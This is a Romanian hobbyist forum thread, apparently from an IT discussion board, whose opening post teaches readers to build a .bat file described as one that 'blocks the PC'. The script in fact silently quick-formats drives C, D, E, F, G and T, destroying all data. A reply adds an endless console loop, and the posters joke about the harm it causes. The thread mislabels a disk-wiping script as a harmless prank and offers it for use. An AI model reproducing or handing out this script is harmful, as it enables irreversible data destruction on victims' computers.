IT - Cum sa facem un program care blocheaza PC-ul (batch)

Aici vom discuta pe tema IT care va include : c++, visual basic, php, html, css si multe altele; veti gasi si diverse stiri.

Moderators: Moderator ajutator, Moderator

skill +4
skill +4
User avatar
Status: Offline
Posts: 348
Registered for: 11 years 7 months
11
Status: Working
Location: #Define
Contact:

IT - Cum sa facem un program care blocheaza PC-ul (batch) Post by MytzaMytz »

Azi o sa va invat cum sa faceti un programel .bat care blocheaza calculatorul.
Deci ce aveti de facut : start > all programs > accesories > notepad in notepad scrieti asta @echo off
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
format t: /q /y > dupa accea aveti de facut asa File > Save as > la Save as type selectati "ALL FILES" la File name ii dati voi un nume si dupa nume fara spatiu fara nimika .bat ! Exemplu : MC-RO.bat

Code: Select all

@echo off
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
format t: /q /y 
Last edited by WoophRadu on 12 Sep 2013, 01:36, edited 1 time in total.
Reason: Titlu editat
Image
full skill
full skill
Status: Offline
Posts: 1216
Registered for: 10 years 9 months
10
Cont Premium: vScorpio
Location: București

Re: [BATCH]Cum sa facem un program care blocheaza PC-ul Post by Scorpio »

Try this! :))

Code: Select all

@echo off
:start
echo %random%%random%%random%%random%%random%%random%%random%%random%
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto start
Have fun! :)) Image
We are anonymous.
We are legion.
We do not forgive.
We do not forget.
Expect us!

Image
Spoiler | Afiseaza
[img]http://www.speedtest.net/result/3627915067.png[/img]
skill +4
skill +4
User avatar
Status: Offline
Posts: 348
Registered for: 11 years 7 months
11
Status: Working
Location: #Define
Contact:

Re: [BATCH]Cum sa facem un program care blocheaza PC-ul Post by MytzaMytz »

Scorpio wrote:Try this! :))

Code: Select all

@echo off
:start
echo %random%%random%%random%%random%%random%%random%%random%%random%
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto start
Have fun! :)) Image
Da si asta e bun :))
"goto start" :))
Image
full skill
full skill
Status: Offline
Posts: 1216
Registered for: 10 years 9 months
10
Cont Premium: vScorpio
Location: București

Re: [BATCH]Cum sa facem un program care blocheaza PC-ul Post by Scorpio »

In caz ca nu face destule prostii. :))
We are anonymous.
We are legion.
We do not forgive.
We do not forget.
Expect us!

Image
Spoiler | Afiseaza
[img]http://www.speedtest.net/result/3627915067.png[/img]
Post a new topic Post a reply

Return to “Discutii IT”